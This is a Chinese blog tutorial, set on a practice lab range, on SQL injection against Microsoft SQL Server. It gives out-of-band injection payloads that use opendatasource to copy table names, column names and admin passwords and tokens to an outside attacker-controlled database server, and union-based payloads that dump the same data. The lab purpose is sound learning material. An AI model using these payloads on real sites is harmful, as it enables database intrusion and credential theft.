18、注入篇--反弹注入(MSSQL)

最新推荐文章于 2022-08-15 11:57:02 发布
最新推荐文章于 2022-08-15 11:57:02 发布
阅读量723 收藏 4
点赞数 2
分类专栏: WEB安全 文章标签: SQL注入 反弹注入 MSSQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42248871/article/details/115580936
版权

MSSQL

MSSQL基础

MSSQL是指微软的SQLServer的数据库服务器

  • 每个库都会自带有sysobjects表,其中有三个字段
    1. name 当前数据库下的所有表名
    2. id 相当于表名的标识
    3. xtype 字段 中 U 代表用户创建的表名,S代表系统创建的
  • 每个库都会自带有syscolumns表,其中有两个字段
    1. name 每个表的字段名
    2. id 对应sysobjects表中id字段

反弹注入

原理

原理:将目标站点中查询到的数据结果 传到攻击者的数据库中
注入条件:网络通畅,攻击者需要有公网ip地址的数据库
所用函数:opendatasource()
将当前数据库查询的结果发送到另外一数据库服务器中
语法:opendatasource(provider_name,int_string)

公式
insert into opendatasource(‘sqloledb’,’server=服务器地址,1433;
uid=用户名;pwd=密码;database=数据库名’).数据库名.dbo.表 SQL语句

条件

​ 网络通常,攻击者需要有公网IP的数据库服务器地址

函数

​ opendatasource()

​ 作用:将目标站点查询到的数据结果 传到攻击者的数据库中

​ 用法:

​ opendatasource(‘sqloledb’,‘server=服务器地址,端口号;uid=用户名;pwd=密码;database=数据库名’)

反弹注入 步骤

  • 需创建用于存放目标站点表名的表,字段有id,name
  • 构造payload 存放 SQL语句查询到的id和name
    ';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DBE69_zkaq_admin;pwd=123456789;database=DB_14DBE69_zkaq').DB_14DBE69_zkaq.dbo.tb select id,name from sysobjects where xtype='U' -- q
  • 创建用于存放目标站点表名的字段名的表,字段有id,name
  • 构造payload
    存放指定表中的字段名
    ';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DBE69_zkaq_admin;pwd=123456789;database=DB_14DBE69_zkaq').DB_14DBE69_zkaq.dbo.col select id,name from syscolumns where id=1977058079 -- q
  • 根据查到的表名字段名 创建表和字段名
  • 构造payload得到结果
    ';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DBE69_zkaq_admin;pwd=123456789;database=DB_14DBE69_zkaq').DB_14DBE69_zkaq.dbo.res select id,username,passwd,token from admin -- q

靶场(反弹注入)

1、创建数据表tb,将查询到的id,name存放在该表中
在这里插入图片描述

2、构造payload, 查询表名

‘;insert into opendatasource(‘sqloledb’,’server=SQL5095.site4now.net,1433;uid=DB_14DBE69_zkaq_admin;
pwd=123456789;database=DB_14DBE69_zkaq’).DB_14DBE69_zkaq.dbo.tb select id,name from sysobjects
 where xtype=’U’ — q

返回正常
在这里插入图片描述

3、查看 tb表 是否有数据
在这里插入图片描述

4、创建存放admin表中字段的表 col
在这里插入图片描述

5、构造payload,查admin表的字段

‘;insert into opendatasource(‘sqloledb’,’server=SQL5095.site4now.net,1433;uid=DB_14DBE69_zkaq_admin;
pwd=123456789;database=DB_14DBE69_zkaq’).DB_14DBE69_zkaq.dbo.col select id,name from syscolumns
 where id=1977058079 — q

页面返回正常
在这里插入图片描述

6、查看数据库中col表
在这里插入图片描述

7、得到admin表中字段:id、username、passwd、token
创建res表 用于存放admin表中字段信息
在这里插入图片描述

8、页面返回正常

在这里插入图片描述

9、查看res表,得到flag
在这里插入图片描述

使用显错注入

显错注入基础

  • union 联合查询 去重
  • union all 不去重 显示全部数据
  • 除了MySQL数据库其他数据库查询内容要写全(select 字段 from 表名)
  • MySQL在联合查询时对字段数有严格的规定,但是对字段类型规定比较淡

显错注入步骤

  • 使用sysobjects表中name、id、xtype探测出用户创建了哪些表

    ’ union all select id,name,null from sysobjects where xtype=‘U’

  • 使用syscolumns表探测指定表id的字段名

    ’ union all select id,name,‘b’ from syscolumns where id=表的id

  • 使用selece 直接爆出数据

    select 字段名 from 表名

靶场

1、进入靶场
在这里插入图片描述

2、1后加\进行探测
在这里插入图片描述

3、构造闭合 ‘ — q
在这里插入图片描述

4、使用order by 探测字段数
order by 4 报错
在这里插入图片描述

order by 3 正常
在这里插入图片描述

字段数为3

5、使用联合查询
在这里插入图片描述

加union all 试一试
在这里插入图片描述

6、猜测表名news
在这里插入图片描述

7、会不会是 数据类型不对呢,1,2,3全部改为null
在这里插入图片描述

8、猜测第一个null是int型,第二ge和第三个是字符型
在这里插入图片描述

9、通过sysobjects表的id、xtype和name 探测用户创建的表名
payload:
‘ union all select id,name,’b’ from sysobjects where xtype=’U’— q
在这里插入图片描述

10、探测admin表中的字段,通过syscolumns表中的id和name
payload:
‘ union all select id,name,’b’ from syscolumns where id=1977058079 — q
在这里插入图片描述

11、查看passwd和token字段数据
payload:
‘ union all select id,passwd,token from admin — q
在这里插入图片描述

12、得到flag,通过

小白学安全
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
09-sql注入-mssql1
08-03
简介msssql 是指sql server 数据库美国Microsoft公司推出的一种关系型数据库系统。SQLServer是一个可扩展的、高性能的、为分布式客户
web安全入门(第五章-4)反弹注入
Yzz_的博客
06-02 493
一、MSSQL反弹注入使用场景 0,MSSQL数据库就是Sql server数据库 1,前言 MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大, 存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖独特的攻击思路 2,遇到问题 明明有注入点却无法进行注入,工具攻击速度也是异常缓慢,错误提示信息关闭, 无法返回注入结果,这些都是在注入攻击中常常遇到的问题。为例解决以上的疑难杂症, 我们来学习反弹注入反弹注入则依靠opendatasource函数支持 3,简
79.网络安全渗透测试—[SQL注入篇18]—[Oracle+JSP-UTL_HTTP.request反弹注入]
qwsn
01-20 3078
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、Oracle+JSP utl_http.request 反弹注入 1、应用场景: 2、应用限制: 3、检测是否支持utl_http.request 4、远程服务器开启侦听:NC瑞士军刀 5、反弹注入命令 二、utl_http.request 反弹注入示例 1、自己的远程服务器开启端口侦听 2、反弹注入:库名、表名、字段名、数据 3、总结:
MSSQL注入——反弹注入
m0_55854679的博客
02-18 890
文章目录MSSQL【SQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQL【SQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
MSSQL注入反弹注入
MSB_WLAQ的博客
10-06 407
MSSQL反弹注入原理 依靠 opendatasource 函数,把查询出的数据发送到MSSQL服务器上。 MSSQL反弹注入使用场景 用香港云快速搭建一个MSSQL环境 可以用临时邮箱注册免费的试用60天。 免费60天的试用,过期了就换个邮箱。 1.猜数据时为什么不能用数字 根据了MSSQL的特性,虽然不能用数字但可用null和字母填充 2.MSSQL有系统自带库吗 有 为master.dbo.sysdatabase 3.反弹注入满足的条件 能否堆叠查询,...
[zkaq靶场]SQL注入--MSSQL反弹注入
wwxxee
05-08 416
MSSQL反弹注入 使用场景 明明是SQL注入点,但是使用工具注入缓慢,或者错误提示信息关闭,无法返回注入结果等。较好的解决办法就是使用反弹注入。 核心 反弹注入的核心就是opendatasouce()函数。 将查询的数据结果插入到我们自己的数据库中。 opendatasource 为了方便理解,可以看理解为 ‘使用opendatasource函数将当前数据库查询的结果发送到另一数据库服务器中。 语法: OPENDATASOURCE(provider_name,init_string) provider_n
在SQL Server数据库之间进行数据导入导出
小强快跑~~
03-13 3257
来源:http://kb.cnblogs.com/page/94464/ 在SQL Server数据库之间进行数据导入导出 (1).使用SELECT INTO导出数据 在SQL Server中使用最广泛的就是通过SELECT INTO语句导出数据,SELECT INTO语句同时具备两个功能: 1、根据SELECT后跟的字段以及INTO后面跟的表名建立空表(如果SELECT后是*, 空表
五、注入(4)MSsql注入——反弹注入
weixin_45540609的博客
04-21 188
MSSQL反弹注入 当明明是注入点却无法进行注入注入工具猜解速度缓慢,错误提示信息关闭,无法返回注入结果等。这时比较好的方法就是使用反弹注入,需要依靠opendatasource函数支持。 反弹注入:目标站点把查询数据的结果插入到黑客的数据库里 条件: 1、网络通畅(需要公网ip) 2、自己的MSSQL数据库 可以申请一个免费的虚拟空间,虚拟空间中开启MSSQL然后直接使用,可以免去MSSQL安装环境且不需要特意购置云服务器来获取一个公网IP。 香港云 http://www.webweb..
mssql-jdbc-10.2.0.jre8.jar jre11,jre17
03-18
java jdbc方式连接mysql的驱动,来自MS官网下载地址。 https://docs.microsoft.com/zh-cn/sql/connect/jdbc/download-microsoft-jdbc-driver-for-sql-server?view=sql-server-ver15
npm-mssql:NodeJS npm模块连接到MSSQL
05-01
require('npm-mssql/objects/MssqlClient'); 使MssqlClient构造函数可用于您的代码。 若要创建新的MssqlClient实例,请调用new MssqlClient(config) ,其中config是必需的哈希对象,其中包含以下属性: datasource ...
mssql-jdbc-6.2.1.jre8
04-14
Java连接数据库SQLServer,对数据库进行增删改查,读取和写入数据。
SQL注入——mssql注入
01-19
1、Mssql权限问题 Mssql角色: 服务器角色–针对运行整个数据库服务器设定的角色和权限。 数据库角色–针对某个特定数据库设定的角色和权限。 固定服务器角色  sysadmin  ...
SQL注入(MSSQL反弹注入)---zkaq
weixin_38237216的博客
04-11 1488
1.概念 1.反弹注入:是一种把查询到的数据插入外部的数据库的方法 2.mysql与Sql Server的区别(不同的函数、不同的系统自带库) mysql系统自带库:table_name,columns_name,information_schema等 mysql独有的语法limit MSSQL:sysconstraints,syssegments等 sysobjects:查询系统表 (xtype=‘U’),'U’代表用户自创的类型;'S’代表系统自带的类型 syscolumns 字段 (id= ) 指定
opendatasource
Spirit
06-14 1146
注:直接用#temp这种表好象就不用这么麻烦了insert%20into%20opendatasource(sqloledb,server=************;uid=sa;pwd=0000;database=hack).hack.dbo.yan%20select%20name%20from%20master.dbo.sysdatabases-- insert into op
MSSQL-反弹注入(zkaq靶场)
v2ish1yan的博客
04-29 3314
MSSQL就是sql server 他跟mysql进行注入的方式有所不同 这里写两种方法 1.联合查询注入 首先mssql使用联合查询时,是不能用select 1,2,3这样填充的,必须要和表中的数据类型一样,但是可以使用null来填充 首先来猜字段 order by 3时正确,order by 4时错误 所以字段数为3 然后进行猜数据类型。先 ?id=1’ union all select NULL,NULL,NULL – qwe 回显正常 挨个测试数据类型 ?id=1’ union all sele
mssql反弹注入
笔墨稠思
11-25 369
1.反弹注入原理 通过opendatasource()将查询到的数据发送到mssql服务器 2.反弹注入使用条件 是否存在堆叠注入 注意事项: 1.mssql 对字段的数据类型要求严格,测试回显点时,可以使用null来代替字段,之后对null进行替换,找出争取的数据类型 2.在使用联合查询时,推荐使用union all 进行查询 3.之前在mysql中查询表和字段时使用的系统自带库 information_schema在mssql中也存在,仍然可以使用,也可以使用其系统自带表,sysobjects查询表名,
MSSQL--反弹注入
qq_68233961的博客
08-15 205
MSSQL--反弹注入
21、XSS--跨站脚本攻击
WX公众号-小白学安全
03-31 2127
XSS概述 ​ Cross Site Scripting – 跨站脚本攻击,为了和CSS层叠样式表区分,故称跨站脚本攻击为XSS ​ 跨站脚本攻击是指攻击者往Web页面里插入恶意Script代码,当用户浏览该页面之时,嵌入Web页面中的Script代码就会被执行,从而达到恶意攻击用户的目的 本质 ​ 用户输入的数据被当作代码代码执行 形成原因 ​ 主要原因是页面对输入和输出的控制不够严格,导致“精心构造的脚本代码”输入后,被浏览器当作有效代码解析执行从而产生危害 危害 盗取用户Cookie 钓鱼攻击
systemctl status mssql-server
最新发布
03-23
systemctl status mssql-server是一个用于查看MSSQL Server服务状态的命令。它可以告诉您MSSQL Server服务是否正在运行以及其他相关信息。 该命令的输出通常包括以下信息: - 服务名称:显示服务的名称,例如mssql-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值